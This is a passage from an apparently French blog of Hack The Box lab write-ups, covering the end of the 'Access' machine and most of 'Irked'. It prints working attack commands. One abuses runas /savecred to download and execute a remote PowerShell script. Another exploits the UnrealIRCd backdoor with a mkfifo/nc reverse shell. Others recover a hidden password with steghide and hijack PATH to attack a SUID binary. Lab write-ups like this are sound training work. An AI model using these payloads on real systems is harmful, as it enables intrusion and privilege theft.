class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; <span class="nb">cd</span> ../Public </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic&gt; <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-a--- 8/22/2018 10:18 PM <span class="m">1870</span> ZKAccess3.5 Security System.lnk </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\P</span>ublic<span class="se">\D</span>esktop&gt; cat Z* </span></span><span class="line"><span class="cl">L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:<span class="se">\R</span>1M?:Windows???:?▒M?:*wWindowsV1MV?System32???:?▒MV?*?System32▒X2P?:? </span></span><span class="line"><span class="cl"> runas.exe???:1??:1?*Yrunas.exe▒L-K??E?C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\r</span>unas.exe#..<span class="se">\.</span>.<span class="se">\.</span>.<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\r</span>unas.exeC:<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5G/user:ACCESS<span class="se">\A</span>dministrator /savecred <span class="s2">&#34;C:\ZKTeco\ZKAccess3.5\Access.exe&#34;</span><span class="err">&#39;</span>C:<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico?%SystemDrive%<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico%SystemDrive%<span class="se">\Z</span>KTeco<span class="se">\Z</span>KAccess3.5<span class="se">\i</span>mg<span class="se">\A</span>ccessNET.ico?%? </span></span><span class="line"><span class="cl"> ?wN?▒?<span class="o">]</span>N?D.??Q???<span class="sb">`</span>?Xaccess?_???8<span class="o">{</span>E?3 </span></span><span class="line"><span class="cl"> O?j<span class="o">)</span>?H??? </span></span><span class="line"><span class="cl"> <span class="o">)</span>??<span class="o">[</span>?_???8<span class="o">{</span>E?3 </span></span><span class="line"><span class="cl"> O?j<span class="o">)</span>?H??? </span></span><span class="line"><span class="cl"> <span class="o">)</span>??<span class="o">[</span>? ??1SPS??XF?L8C???<span class="p">&amp;</span>?m?e*S-1-5-21-953262931-566350628-63446256-500 </span></span></code></pre></td></tr></table> </div> </div><p>En fouillant dans les dossiers, on trouve un fichier ZKAccess.lnk qui semble executer un binaire &ldquo;Access.exe&rdquo; avec des droits élévé :</p> <blockquote> <p>Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred &ldquo;C:\ZKTeco\ZKAccess3.5\Access.exe On observe l&rsquo;utilisation de runas, pour executer un fichier en tant qu&rsquo;un utilisateur spécifique. En l&rsquo;occurence, ici, il s&rsquo;agit de l&rsquo;Administrator (celui qui nous intéresse). Apparement les creds de l&rsquo;administrateur sont enregistrés, et on peut executer n&rsquo;importe quelle commande en tant qu&rsquo;Administrator en utilisant l&rsquo;argument /savecred.</p> </blockquote> <p>On tente d&rsquo;utiliser à nouveau notre script Invoke.ps1 pour ouvrir un reverseshell de type powershell en tant qu&rsquo;Administrator, et ça fonctionne. On a changé le port dans le Invoke.ps1 bien sûr car le port est déjà utiliser sur la kali pour le powershell actuel.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; runas /user:ACCESS<span class="se">\A</span>dministrator /savecred <span class="s2">&#34;powershell /C IEX(New-Object Net.WebClient).downloadString(&#39;http://10.10.16.9:8888/Invoke.ps1&#39;)&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------KALI--------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1339</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1339</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.9<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.98<span class="o">]</span> <span class="m">49216</span> </span></span><span class="line"><span class="cl">Windows PowerShell running as user Administrator on ACCESS </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">access<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">cd</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator&gt; <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar-- 2/16/2025 6:02 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">339f.....e901 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours fouiller les dossiers des utilisateurs accessibles, avant d&rsquo;effectuer un <strong>winPEAS</strong>.</li> </ul>https://leopoldabgn.github.io/writeups/p/irked-htb/Sun, 16 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/irked-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Irked cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Irked</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.117</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="system-info">System info </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ircd@irked:/home/djmardov/Documents$ uname -a </span></span><span class="line"><span class="cl">Linux irked 3.16.0-6-686-pae <span class="c1">#1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux</span> </span></span><span class="line"><span class="cl">ircd@irked:/home/djmardov/Documents$ lsb_release -a </span></span><span class="line"><span class="cl">No LSB modules are available. </span></span><span class="line"><span class="cl">Distributor ID: Debian </span></span><span class="line"><span class="cl">Description: Debian GNU/Linux 8.10 <span class="o">(</span>jessie<span class="o">)</span> </span></span><span class="line"><span class="cl">Release: 8.10 </span></span><span class="line"><span class="cl">Codename: jessie </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.117 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u4 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1024</span> 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad <span class="o">(</span>DSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-dss AAAAB3NzaC1kc3MAAACBAI+wKAAyWgx/P7Pe78y6/80XVTd6QEv6t5ZIpdzKvS8qbkChLB7LC+/HVuxLshOUtac4oHr/IF9YBytBoaAte87fxF45o3HS9MflMA4511KTeNwc5QuhdHzqXX9ne0ypBAgFKECBUJqJ23Lp2S9KuYEYLzUhSdUEYqiZlcc65NspAAAAFQDwgf5Wh8QRu3zSvOIXTk+5g0eTKQAAAIBQuTzKnX3nNfflt++gnjAJ/dIRXW/KMPTNOSo730gLxMWVeId3geXDkiNCD/zo5XgMIQAWDXS+0t0hlsH1BfrDzeEbGSgYNpXoz42RSHKtx7pYLG/hbUr4836olHrxLkjXCFuYFo9fCDs2/QsAeuhCPgEDjLXItW9ibfFqLxyP2QAAAIAE5MCdrGmT8huPIxPI+bQWeQyKQI/lH32FDZb4xJBPrrqlk9wKWOa1fU2JZM0nrOkdnCPIjLeq9+Db5WyZU2u3rdU8aWLZy8zF9mXZxuW/T3yXAV5whYa4QwqaVaiEzjcgRouex0ev/u+y5vlIf4/SfAsiFQPzYKomDiBtByS9XA<span class="o">==</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj </span></span><span class="line"><span class="cl">80/tcp open http syn-ack Apache httpd 2.4.10 <span class="o">((</span>Debian<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.10 <span class="o">(</span>Debian<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: OPTIONS GET HEAD POST </span></span><span class="line"><span class="cl">111/tcp open rpcbind syn-ack 2-4 <span class="o">(</span>RPC <span class="c1">#100000)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> rpcinfo: </span></span><span class="line"><span class="cl"><span class="p">|</span> program version port/proto service </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> 2,3,4 111/tcp rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> 2,3,4 111/udp rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> 3,4 111/tcp6 rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> 3,4 111/udp6 rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100024</span> <span class="m">1</span> 34862/tcp status </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100024</span> <span class="m">1</span> 41825/tcp6 status </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100024</span> <span class="m">1</span> 46351/udp status </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">100024</span> <span class="m">1</span> 49135/udp6 status </span></span><span class="line"><span class="cl">6697/tcp open irc syn-ack UnrealIRCd </span></span><span class="line"><span class="cl">8067/tcp open irc syn-ack UnrealIRCd </span></span><span class="line"><span class="cl">34862/tcp open status syn-ack <span class="m">1</span> <span class="o">(</span>RPC <span class="c1">#100024)</span> </span></span><span class="line"><span class="cl">65534/tcp open irc syn-ack UnrealIRCd </span></span><span class="line"><span class="cl">Service Info: Host: irked.htb<span class="p">;</span> OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="exploit-unrealircd">Exploit: UnrealIRCd </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -nv 10.10.10.117 <span class="m">6697</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.117<span class="o">]</span> <span class="m">6697</span> <span class="o">(</span>ircs-u<span class="o">)</span> open </span></span><span class="line"><span class="cl">:irked.htb NOTICE AUTH :*** Looking up your hostname... </span></span><span class="line"><span class="cl">AB<span class="p">;</span> rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>bash -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.14.27 <span class="m">1337</span> &gt;/tmp/f </span></span><span class="line"><span class="cl">:irked.htb NOTICE AUTH :*** Couldn<span class="s1">&#39;t resolve your hostname; using your IP address instead </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">------------------------------------------ </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">┌──(kali㉿kali)-[~] </span></span></span><span class="line"><span class="cl"><span class="s1">└─$ nc -lnvp 1337 </span></span></span><span class="line"><span class="cl"><span class="s1">listening on [any] 1337 ... </span></span></span><span class="line"><span class="cl"><span class="s1">connect to [10.10.16.19] from (UNKNOWN) [10.10.10.117] 53736 </span></span></span><span class="line"><span class="cl"><span class="s1">bash: cannot set terminal process group (625): Inappropriate ioctl for device </span></span></span><span class="line"><span class="cl"><span class="s1">bash: no job control in this shell </span></span></span><span class="line"><span class="cl"><span class="s1">ircd@irked:~/Unreal3.2$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">whoami </span></span></span><span class="line"><span class="cl"><span class="s1">pwdircd </span></span></span><span class="line"><span class="cl"><span class="s1">ircd@irked:~/Unreal3.2$ </span></span></span><span class="line"><span class="cl"><span class="s1">pwd </span></span></span><span class="line"><span class="cl"><span class="s1">/home/ircd/Unreal3.2 </span></span></span><span class="line"><span class="cl"><span class="s1">ircd@irked:~/Unreal3.2$ python3 -V </span></span></span><span class="line"><span class="cl"><span class="s1">python3 -V </span></span></span><span class="line"><span class="cl"><span class="s1">Python 3.4.2 </span></span></span><span class="line"><span class="cl"><span class="s1">ircd@irked:~/Unreal3.2$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="s1">&#39; </span></span></span><span class="line"><span class="cl"><span class="s1">python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">ircd@irked:~/Unreal3.2$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">ircd@irked:~/Unreal3.2$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ircd@irked:~/Unreal3.2$ </span></span><span class="line"><span class="cl">ircd@irked:~/Unreal3.2$ whoami </span></span><span class="line"><span class="cl">ircd </span></span></code></pre></td></tr></table> </div> </div><h2 id="ircd---djmardov">ircd -&gt; djmardov </h2><h3 id="backup---password">.backup - password </h3><p>On trouve un fichier .backup dans les documents du user djmardov, avec un mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ircd@irked:/home/djmardov/Documents$ cat .backup </span></span><span class="line"><span class="cl">Super elite steg backup pw </span></span><span class="line"><span class="cl">UPupDOWNdownLRlrBAbaSSss </span></span></code></pre></td></tr></table> </div> </div><h3 id="steg-hide">steg hide </h3><p>On trouve le mot &ldquo;steg&rdquo; et &ldquo;pw&rdquo; dans le fichier .backup. On suppose qu&rsquo;il faut faire la stegano sur une image. La seule image disponible sur le serveur est celle du site web, dans /var/www/html/irked.jpg. On utilise l&rsquo;outil steg hide pour extraire une string de l&rsquo;image en utilsant le mot de passe fournit, et ça fonctionne, on recupere le mot de passe de djmardov:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Irked<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ steghide extract -p UPupDOWNdownLRlrBAbaSSss -sf ./irked.jpg </span></span><span class="line"><span class="cl">wrote extracted data to <span class="s2">&#34;pass.txt&#34;</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Irked<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat pass.txt </span></span><span class="line"><span class="cl">Kab6h+m+bbp2J:HG </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-djmardov---user-flag">SSH djmardov - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Irked<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh djmardov@irked.htb </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;irked.htb (10.10.10.117)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yzqs </span></span></span><span class="line"><span class="cl"><span class="s1">Please type &#39;</span>yes<span class="s1">&#39;, &#39;</span>no<span class="s1">&#39; or the fingerprint: yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>irked.htb<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">Kab6h+m+bbp2J:HG </span></span></span><span class="line"><span class="cl"><span class="s1">djmardov@irked.htb&#39;</span>s password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Tue May <span class="m">15</span> 08:56:32 <span class="m">2018</span> from 10.33.3.3 </span></span><span class="line"><span class="cl">djmardov@irked:~$ whoami </span></span><span class="line"><span class="cl">djmardov </span></span><span class="line"><span class="cl">djmardov@irked:~$ ls </span></span><span class="line"><span class="cl">Desktop Documents Downloads Music Pictures Public Templates user.txt Videos </span></span><span class="line"><span class="cl">djmardov@irked:~$ cat user.txt </span></span><span class="line"><span class="cl">0d95.....9a07 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="suid-binary-viewuser">SUID binary: viewuser </h3><p>Après avoir executé linpeas, on observe un SUID binary suspect : /usr/bin/viewuser. Et oui, fallait remarquer ça&hellip; En regardant de plus près, on remarque qu&rsquo;il existe la commande &ldquo;who&rdquo; sans utiliser de chemin absolu. On ajoute donc au PATH le dossier /tmp puis on crée un fichier avec une commande pour mettre le bit SUID sur /bin/bash et pour executer bash -p en tant que root directement. On aurait pu mettre potentiellement /bin/bash directement dans who egalement.</p> <p>Dans les write up, on remarque plutot l&rsquo;utilisation du fichier /tmp/listusers avec un /bin/bash dedans, tout simplemment ! car on a un setuid(0); system(&rsquo;/tmp/listusers&rsquo;) dans le binaire. On remarque qu&rsquo;il n&rsquo;y a pas de setuid(0) avant le system(&lsquo;who&rsquo;)&hellip; Donc je ne vois pas comment mon exploit fonctionne, pourtant ça fonctionne bien !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bash-4.3# <span class="nb">echo</span> <span class="nv">$PATH</span> </span></span><span class="line"><span class="cl">/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games </span></span><span class="line"><span class="cl">bash-4.3# <span class="nb">export</span> <span class="nv">PATH</span><span class="o">=</span>/tmp:<span class="nv">$PATH</span> 